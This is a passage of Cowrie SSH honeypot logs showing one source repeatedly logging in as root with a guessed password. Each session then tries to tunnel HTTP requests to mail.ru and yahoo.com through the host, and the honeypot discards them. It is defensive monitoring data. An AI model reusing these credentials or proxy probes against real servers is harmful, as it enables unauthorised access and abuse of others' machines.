25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.776456Z","src_ip":"77.83.207.83","session":"c64229aa3090"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.027859Z","src_ip":"77.83.207.83","session":"c64229aa3090"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13101,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13101","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.079216Z","session":"c64229aa3090"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.129628Z","src_ip":"77.83.207.83","session":"c64229aa3090"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":29931,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29931","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.272712Z","session":"c64229aa3090"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.323110Z","src_ip":"77.83.207.83","session":"c64229aa3090"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":30102,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30102","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.464931Z","session":"c64229aa3090"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.515417Z","src_ip":"77.83.207.83","session":"c64229aa3090"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.567279Z","src_ip":"77.83.207.83","session":"c64229aa3090"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44219,"dst_ip":"1.2.3.4","dst_port":22,"session":"2df1b0df12e6","protocol":"ssh","message":"New connection: 77.83.207.83:44219 (1.2.3.4:22) [session: 2df1b0df12e6]","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.618325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.628795Z","src_ip":"77.83.207.83","session":"2df1b0df12e6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.670940Z","src_ip":"77.83.207.83","session":"2df1b0df12e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:32.974088Z","src_ip":"77.83.207.83","session":"2df1b0df12e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29942,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:29942","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.027133Z","session":"2df1b0df12e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.079623Z","src_ip":"77.83.207.83","session":"2df1b0df12e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":30765,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:30765","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.226542Z","session":"2df1b0df12e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.278744Z","src_ip":"77.83.207.83","session":"2df1b0df12e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":19734,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19734","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.426437Z","session":"2df1b0df12e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.478696Z","src_ip":"77.83.207.83","session":"2df1b0df12e6"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.531418Z","src_ip":"77.83.207.83","session":"2df1b0df12e6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44315,"dst_ip":"1.2.3.4","dst_port":22,"session":"99490d713570","protocol":"ssh","message":"New connection: 77.83.207.83:44315 (1.2.3.4:22) [session: 99490d713570]","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.580107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.590347Z","src_ip":"77.83.207.83","session":"99490d713570"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.629957Z","src_ip":"77.83.207.83","session":"99490d713570"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.878401Z","src_ip":"77.83.207.83","session":"99490d713570"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28102,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28102","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.929256Z","session":"99490d713570"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:33.979148Z","src_ip":"77.83.207.83","session":"99490d713570"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":27877,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27877","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.120162Z","session":"99490d713570"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.169967Z","src_ip":"77.83.207.83","session":"99490d713570"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":6648,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6648","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.312134Z","session":"99490d713570"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.361898Z","src_ip":"77.83.207.83","session":"99490d713570"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.412839Z","src_ip":"77.83.207.83","session":"99490d713570"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44406,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1f40a36324e","protocol":"ssh","message":"New connection: 77.83.207.83:44406 (1.2.3.4:22) [session: c1f40a36324e]","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.464747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.474568Z","src_ip":"77.83.207.83","session":"c1f40a36324e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.517871Z","src_ip":"77.83.207.83","session":"c1f40a36324e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.780908Z","src_ip":"77.83.207.83","session":"c1f40a36324e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17620,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17620","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.834377Z","session":"c1f40a36324e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:34.887211Z","src_ip":"77.83.207.83","session":"c1f40a36324e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":465,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:465","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.035188Z","session":"c1f40a36324e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.087872Z","src_ip":"77.83.207.83","session":"c1f40a36324e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":7291,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:7291","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.234998Z","session":"c1f40a36324e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.287548Z","src_ip":"77.83.207.83","session":"c1f40a36324e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.341034Z","src_ip":"77.83.207.83","session":"c1f40a36324e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44508,"dst_ip":"1.2.3.4","dst_port":22,"session":"66b4ed9eafa2","protocol":"ssh","message":"New connection: 77.83.207.83:44508 (1.2.3.4:22) [session: 66b4ed9eafa2]","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.391014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.391960Z","src_ip":"77.83.207.83","session":"66b4ed9eafa2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.442706Z","src_ip":"77.83.207.83","session":"66b4ed9eafa2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.695777Z","src_ip":"77.83.207.83","session":"66b4ed9eafa2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5321,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:5321","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.747572Z","session":"66b4ed9eafa2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.798859Z","src_ip":"77.83.207.83","session":"66b4ed9eafa2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9005,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9005","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.941467Z","session":"66b4ed9eafa2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:35.992334Z","src_ip":"77.83.207.83","session":"66b4ed9eafa2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":25077,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25077","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.137221Z","session":"66b4ed9eafa2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.188105Z","src_ip":"77.83.207.83","session":"66b4ed9eafa2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.240140Z","src_ip":"77.83.207.83","session":"66b4ed9eafa2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44608,"dst_ip":"1.2.3.4","dst_port":22,"session":"012a5cc1a6d6","protocol":"ssh","message":"New connection: 77.83.207.83:44608 (1.2.3.4:22) [session: 012a5cc1a6d6]","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.289908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.290734Z","src_ip":"77.83.207.83","session":"012a5cc1a6d6"}
